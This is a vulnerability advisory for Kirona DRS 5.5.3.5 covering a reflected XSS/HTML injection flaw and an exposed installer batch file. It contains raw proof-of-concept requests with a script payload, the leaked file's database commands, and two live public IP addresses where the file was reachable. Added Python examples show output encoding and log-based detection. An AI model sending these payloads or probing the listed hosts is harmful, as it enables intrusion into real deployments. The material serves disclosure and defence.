# Exploit Title: Kirona-DRS version 5.5.3.5 Multiple Vulnerabilities.
# Discovered Date: 03/10/2019
# Shodan Search: /opt-portal/pages/login.xhtml
# Exploit Author: Ramikan
# Vendor Homepage: https://www.kirona.com/products/dynamic-resource-scheduler/
# Affected Version: DRS 5.5.3.5, possibly other versions.
# Tested On Version: DRS 5.5.3.5 on PHP/5.6.14
# Vendor Fix: Unknown
# CVE: CVE-2019-17503, CVE-2019-17504
# Category: Web Apps
# Reference : https://github.com/Ramikan/Vulnerabilities/blob/master/Kirona-DRS 5.5.3.5 Multiple Vulnerabilities
# Blog: www.fact-in-hack.blogspot.com
***************************************************************************************************************************
Description:
The application is vulnerable to HTML injection, reflected cross-site scripting and sensitive data disclosure.
***************************************************************************************************************************
Vulnerability 1: HTML injection and Cross Site Scripting (CVE-2019-17504)
***************************************************************************************************************************
An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. A reflected cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script via the 'password' parameter of /osm/report/. The parameter is written unencoded into the value attribute of a hidden input in the response.
Affected URL: /osm/report/
Affected Parameter: password
POST Request:
POST /osm/report/ HTTP/1.1
Host: 10.50.3.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
Connection: close
Referer: https://10.50.3.148/osm/report/
Upgrade-Insecure-Requests: 1

create=true&password=&login=admin&password='<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--
Response:
HTTP/1.1 200 OK
Date: Thu, 03 Oct 2019 14:56:05 GMT
Server: Apache
X-Powered-By: PHP/5.6.14
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
XDomainRequestAllowed: 1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Oct 2019 14:56:05 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 728
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head>
<img src='logo.jpg'>
<form method='POST'>
<input type='hidden' name='create' value='true'/>
<input type='hidden' name='password' value=''<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/>
<table>
<tr><td>Login:</td><td><input type='login' name='login'/></td></tr>
<tr><td>Password:</td><td><input type='password' name='password'/></td></tr>
<tr><td colspan='2'><input type='submit' value='Login'/> </td></tr>
</table>
</form>
</head>
</html>
GET Request:
GET https://10.0.1.110/osm/report/?password=%27%3C%22%20%3E%3C%3Ch1%3EHTML%20Injection-heading%20tag%20used%3C/h1%3E%3Cscript%3Ealert(%22This%20is%20Cross%20Site%20Scripting%22)%3C/script%3E%3C!-- HTTP/1.1
Host: vs-kdrs-l-01.selwoodhousing.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Date: Thu, 03 Oct 2019 14:53:35 GMT
Server: Apache
X-Powered-By: PHP/5.6.14
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
XDomainRequestAllowed: 1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Oct 2019 14:53:35 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 728
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head>
<img src='logo.jpg'>
<form method='POST'>
<input type='hidden' name='create' value='true'/>
<input type='hidden' name='password' value=''<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/>
<table>
<tr><td>Login:</td><td><input type='login' name='login'/></td></tr>
<tr><td>Password:</td><td><input type='password' name='password'/></td></tr>
<tr><td colspan='2'><input type='submit' value='Login'/> </td></tr>
</table>
</form>
</head>
</html>
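The root cause visible in both responses is that the raw password parameter is concatenated into a single-quoted value attribute, so a leading quote closes the attribute and everything after it becomes markup. The following is an added example, not code from the advisory or from the vendor: a Python stand-in for that PHP template showing the vulnerable concatenation beside the attribute-encoded form, plus a check that the page's own payload no longer introduces any element. The template string, function names and the check are assumptions; on the PHP side the equivalent encoding call is htmlspecialchars($value, ENT_QUOTES, 'UTF-8').

```python
import html

# The password value exactly as reflected in the captured response above.
REFLECTED_PAYLOAD = ("'<\" ><<h1>HTML Injection-heading tag used</h1>"
                     "<script>alert(\"This is Cross Site Scripting\")</script><!--")

# Hypothetical stand-in for the PHP template that emits the hidden field.
FIELD_TEMPLATE = "<input type='hidden' name='password' value='{value}'/>"


def render_vulnerable(password: str) -> str:
    """Reproduces the defect: the parameter is concatenated verbatim into a
    single-quoted attribute, so a leading quote closes the attribute and the
    rest of the string is parsed as markup."""
    return FIELD_TEMPLATE.format(value=password)


def render_fixed(password: str) -> str:
    """Hardened form: encode for an HTML attribute context before
    concatenation. html.escape(..., quote=True) turns & < > " and ' into
    entities, the same set PHP's htmlspecialchars(..., ENT_QUOTES) encodes."""
    return FIELD_TEMPLATE.format(value=html.escape(password, quote=True))


def introduces_markup(fragment: str) -> bool:
    """Structural check for a fragment that should contain exactly one
    element: any second '<' means the attribute value leaked into markup."""
    return fragment.count("<") != 1 or "<script" in fragment.lower()


def round_trips(password: str) -> bool:
    """Entity encoding is reversible: a browser decodes the attribute before
    submitting the form, so the encoded value reaches the server unchanged."""
    return html.unescape(html.escape(password, quote=True)) == password


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        out = render(REFLECTED_PAYLOAD)
        print(f"{label}: {out}")
        print(f"{label} introduces markup: {introduces_markup(out)}")
```

The encoded rendering keeps the submitted value intact (round_trips returns True) while the fragment contains a single element, which is the property an attribute-context encoder must guarantee.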
***************************************************************************************************************************
Vulnerability 2: Source code and sensitive data disclosure (CVE-2019-17503)
***************************************************************************************************************************
An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly: it contains sensitive information about the database through the SQL queries within this batch file. This file exposes SQL database information such as database version, table name, column name, etc.
Affected URL: /osm/REGISTER.cmd or /osm_tiles/REGISTER.cmd
Live example:
https://79.174.169.85/osm/REGISTER.cmd
http://82.196.226.108/osm_tiles/REGISTER.cmd
Request:
GET /osm/REGISTER.cmd HTTP/1.1
Host: 10.0.0.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:
HTTP/1.1 200 OK
Date: Thu, 03 Oct 2019 09:23:54 GMT
Server: Apache
Last-Modified: Tue, 07 Nov 2017 09:27:52 GMT
ETag: "1fc4-55d612f6cae13"
Accept-Ranges: bytes
Content-Length: 8132
Connection: close
@echo off
set DEBUGMAPSCRIPT=TRUE
rem
rem Find root path and batch name
rem root path is found relative to the current batch name
rem
rem turn to short filename (remove white spaces)
for %%i in (%0) do (
set SHORT_MAPSCRIPTBATCH_FILE=%%~fsi
set MAPSCRIPTBATCH_FILE=%%~i
)
for %%i in (%SHORT_MAPSCRIPTBATCH_FILE%) do (
set MAPSCRIPTROOTDIR=%%~di%%~pi..\..\..
)
if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTROOTDIR=%MAPSCRIPTROOTDIR%
if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTBATCH_FILE=%MAPSCRIPTBATCH_FILE%
rem
rem find if we are in INTERRACTIVE mode or not and check the parameters
rem
if "%1"=="" goto INTERACTIVE
goto NONINTERRACTIVE
:NONINTERRACTIVE
rem non interractive call so catch the parameters from command line
rem this is supposed to be called from the root DRS directory
if "%2"=="" (
echo Invalid parameter 2
pause
goto :EOF
)
set ACCOUNT=%2
set STATIC=NO
if "%1"=="STATIC" set STATIC=YES
if "%DEBUGMAPSCRIPT%"=="TRUE" echo Command line mode %STATIC% %ACCOUNT%
if "%1"=="STATIC" goto GLOBAL
if "%1"=="DYNAMIC" goto GLOBAL
echo Invalid parameter 1
pause
goto :EOF
:INTERACTIVE
rem Interractive mode : ask for account and static mode
if "%DEBUGMAPSCRIPT%"=="TRUE" echo Interractive mode
echo Open Street Map setup for Xmbrace DRS
set /P ACCOUNT=Account name:
set /P STATIC=Limited map feature (YES/NO):
rem back to the setup directory
cd %MAPSCRIPTROOTDIR%
rem # READ AND DEFINE SETTINGS
for /F "tokens=1,* delims==" %%k in (conf\default.txt) do (
if not "%%k"=="#=" set %%k=%%l
)
if exist CUSTOM\CONF\custom.txt (
for /F "tokens=1,* delims==" %%k in (CUSTOM\CONF\custom.txt) do (
if not "%%k"=="#=" set %%k=%%l
)
)
for /F "tokens=1,* delims==" %%k in (conf\settings.txt) do (
if not "%%k"=="#=" set %%k=%%l
)
if "%APACHE_USE_SSL%"=="TRUE" (
set DEFAULT_HTTP_PROTOCOL=https
set APACHE_USE_SSL_VALUE=true
set DEFAULT_HTTP_PORT=%APACHE_HTTPS_PORT%
) else (
set DEFAULT_HTTP_PROTOCOL=http
set APACHE_USE_SSL_VALUE=false
set DEFAULT_HTTP_PORT=%APACHE_HTTP_PORT%
)
goto GLOBAL
rem
rem good to go in a non interractive mode
rem the following is the generic par of the install, whatever we are in static or dynamic mode
rem
:GLOBAL
if "%DEBUGMAPSCRIPT%"=="TRUE" echo Global section
set MYSQL="MYSQL\MySQL Server 5.6 MariaDB\bin\mysql.exe"
echo delete from %ACCOUNT%.asp_custom_action where CA_CAPTION in ('Show on map','Closest')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo delete from %ACCOUNT%.asp_custom_tab where NAME='Map'> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
set INSERTFIELDS=%ACCOUNT%.asp_custom_action (CA_CAPTION,CA_VIEW,CA_MODE,CA_LIST_MODE,CA_HEIGHT,CA_WIDTH,CA_RESIZABLE,CA_NEED_REFRESH,CA_PROFILES,CA_URL,CA_CUSTOM_TAB,CA_TRIGGER_MODE)
if "%STATIC%"=="YES" goto :STATIC
goto :DYNAMIC
:STATIC
if "%DEBUGMAPSCRIPT%"=="TRUE" echo Static section
echo map=static > ACCOUNTS\%ACCOUNT%\config.txt
echo ^<?php $staticMap=true; ?^>>APACHE\htdocs\osm\mode.php
echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Journey on map','workerView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
if exist req.sql del req.sql
goto FINAL
:DYNAMIC
if "%DEBUGMAPSCRIPT%"=="TRUE" echo Dynamic section
echo map=dynamic > ACCOUNTS\%ACCOUNT%\config.txt
echo ^<?php $staticMap=false; ?^>>APACHE\htdocs\osm\mode.php
echo insert into %INSERTFIELDS% values ('Show on map','jobList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','jobView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Closest','jobList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Closest','jobView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','workerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','workerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','mandatory',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
rem %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','customerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','customerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','planning','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
set INSERTFIELDS=%ACCOUNT%.asp_custom_tab (NAME,POSITION,ADMIN,URL,WIDTH,HEIGHT)
echo insert into %INSERTFIELDS% values ('Map',0,'false','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%','100%%','100%%')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
if exist req.sql del req.sql
goto FINAL
:FINAL
echo Map registred for %ACCOUNT%
if "%1"=="" pause
goto :EOF
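Both issues leave traces in the web server's access log: any fetch of REGISTER.cmd under /osm/ or /osm_tiles/ (the status code tells whether the file was actually served), and the GET form of the reflected payload on /osm/report/. The POST form carries the payload in the request body, which a standard access log does not record. The following is an added example and not part of the advisory: a Python scan over constructed Apache combined-format log lines that flags both patterns. The log lines, client addresses and timestamps are constructed; the paths and the URL-encoded payload come from the requests above, and the function names and hit format are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample in Apache combined log format. Paths and the encoded
# payload mirror the advisory; addresses, timestamps and agents are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [03/Oct/2019:14:53:35 +0000] "GET /osm/report/?password=%27%3C%22%20%3E%3C%3Ch1%3EHTML%20Injection-heading%20tag%20used%3C/h1%3E%3Cscript%3Ealert(%22This%20is%20Cross%20Site%20Scripting%22)%3C/script%3E%3C!-- HTTP/1.1" 200 728 "-" "Mozilla/5.0"
192.0.2.11 - - [03/Oct/2019:09:23:54 +0000] "GET /osm/REGISTER.cmd HTTP/1.1" 200 8132 "-" "Mozilla/5.0"
192.0.2.12 - - [03/Oct/2019:09:24:10 +0000] "GET /osm_tiles/register.cmd HTTP/1.1" 404 196 "-" "Mozilla/5.0"
192.0.2.13 - - [03/Oct/2019:10:02:00 +0000] "GET /osm/map.php?account=demo&mapType=journey HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.14 - - [03/Oct/2019:10:05:00 +0000] "POST /osm/report/ HTTP/1.1" 200 728 "-" "Mozilla/5.0"
"""

# Combined log format: client, identd, user, [timestamp], "request line", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# The installer batch file under either of the two paths named in the advisory.
BATCH_RE = re.compile(r"^/(osm|osm_tiles)/register\.cmd$", re.IGNORECASE)
# An opening tag, closing tag or comment start inside the decoded parameter.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]", re.IGNORECASE)


def classify(line: str):
    """Return a hit record for a line that matches one of the two patterns,
    or None for an ordinary request or an unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # Decode and normalise so /osm/./REGISTER.cmd or %52EGISTER.cmd is caught too.
    path = posixpath.normpath(unquote(parts.path))
    base = {"ip": m.group("ip"), "ts": m.group("ts"),
            "status": m.group("status"), "path": path}
    if BATCH_RE.match(path):
        return dict(base, cve="CVE-2019-17503", detail="REGISTER.cmd requested")
    if path == "/osm/report" and m.group("method") == "GET":
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("password", []):
            if MARKUP_RE.search(value):
                return dict(base, cve="CVE-2019-17504",
                            detail="markup in reflected password parameter")
    return None


def scan(log_text: str) -> list:
    """Scan a whole log and keep only the hits, in file order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['cve']} status={hit['status']} {hit['detail']}")
```

A 200 on the batch-file path means the file was served and its contents (including the MySQL credentials the script expands at run time) should be treated as exposed; a 404 still records a probe. Until a vendor fix is available, the file itself has no business under the document root, and denying it at the web server is a cheap interim control. The POST variant of the XSS needs request-body logging or an inline WAF to be seen.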
***************************************************************************************************************************
Recommendation:
***************************************************************************************************************************
Contact vendor for the fix.